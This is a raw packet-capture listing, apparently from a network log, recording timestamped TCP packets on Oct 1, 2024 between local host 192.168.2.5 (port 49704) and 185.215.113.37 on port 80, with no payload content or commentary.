Oct 1, 2024 16:50:07.687077999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687079906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687092066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687103033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687108994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687165976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687172890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687182903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687194109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687203884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687215090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687223911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687246084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687246084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687283993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687482119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687491894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687504053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687513113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687525034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687534094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687540054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687551975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687560081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687581062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687581062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687581062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687592030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687602043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687612057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687614918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687624931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687633991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687645912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687653065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687653065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687655926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687666893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687676907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687685966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687697887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687701941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687701941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687757015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687757015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687856913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687879086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687891960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687896967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687903881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687903881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687911034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687916994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687922955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687923908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687928915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687933922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687939882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687958956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687973022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687983990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687988043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688010931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688047886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688060045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688070059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688079119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688107967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688118935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688124895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688129902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688142061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688158989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688160896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.688174963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688216925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.688216925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.721584082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721610069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721620083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721667051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721700907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721700907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.721714020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721724033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721740007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721745014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.721750975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721760035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.721776962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721782923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.721788883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721798897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.721817970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.721851110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722028017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722100019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722110987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722176075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722239017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722290993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722301006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722311974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722377062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722387075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722392082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722435951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722436905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722489119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722500086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722508907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722518921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722528934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722537041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722537994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722548962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722578049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722578049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722601891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722604990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722613096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722623110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722632885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722642899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722655058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722665071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722666025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722666025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722708941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722724915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722796917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722806931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722807884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722816944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722826958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722836971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722841024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722846985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722884893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722884893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.722954988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722965002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722975016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722985029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722995043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.722997904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.723005056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.723015070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.723047018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.723047018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.774698019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774722099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774733067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774797916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774810076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774816990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.774821043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774832010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.774883032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.774936914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775326967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775338888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775355101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775362968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775367975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775394917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775394917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775441885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775464058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775480986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775490999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775515079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775521040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775521040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775527000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775537014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775547981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775557041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775561094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775561094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775573969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775578022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775584936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775610924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775643110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775674105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775708914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775719881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775748968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775748968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775760889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775769949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775783062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775793076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775798082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775808096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775830030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775830030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775865078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775922060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775933027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775943041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775952101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775964022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.775968075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775986910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775998116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.775999069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776007891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776053905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776053905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776173115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776209116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776221037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776227951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776258945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776319027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776329994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776340008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776350021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776360035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776370049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776376009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776376009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776380062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776391983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776417017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776427031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776436090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776437998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776437998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776482105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776482105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776492119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776501894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776510954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776520014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776529074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776535034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776557922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776590109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776597023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776607990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776617050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776626110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776635885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776648998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776654959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776655912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776665926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776675940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776685953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776695013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776704073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776710033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776721954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776747942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776751995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776763916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776778936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776788950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776796103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776798964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776808977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776808977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776819944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776829958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.776851892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776851892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.776873112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.828798056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828833103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828845024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828876972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828891993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828902960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828912973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828923941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828936100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.828958988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.828958988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.828986883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829062939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829073906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829086065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829102993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829113007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829113007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829123974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829134941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829144001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829154968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829164982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829174042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829175949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829186916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829189062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829197884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829206944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829233885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829243898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829253912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829262018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829265118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829274893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829284906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829294920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829299927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829299927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829305887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829317093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829327106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829336882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829348087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829353094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829353094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829361916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829385996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829385996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829395056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829406023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829421043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829438925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829448938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829449892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829448938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829459906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829471111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829482079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.829494953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829494953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.829545021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.874876022 CEST	80	49704	185.215.113.37	192.168.2.5
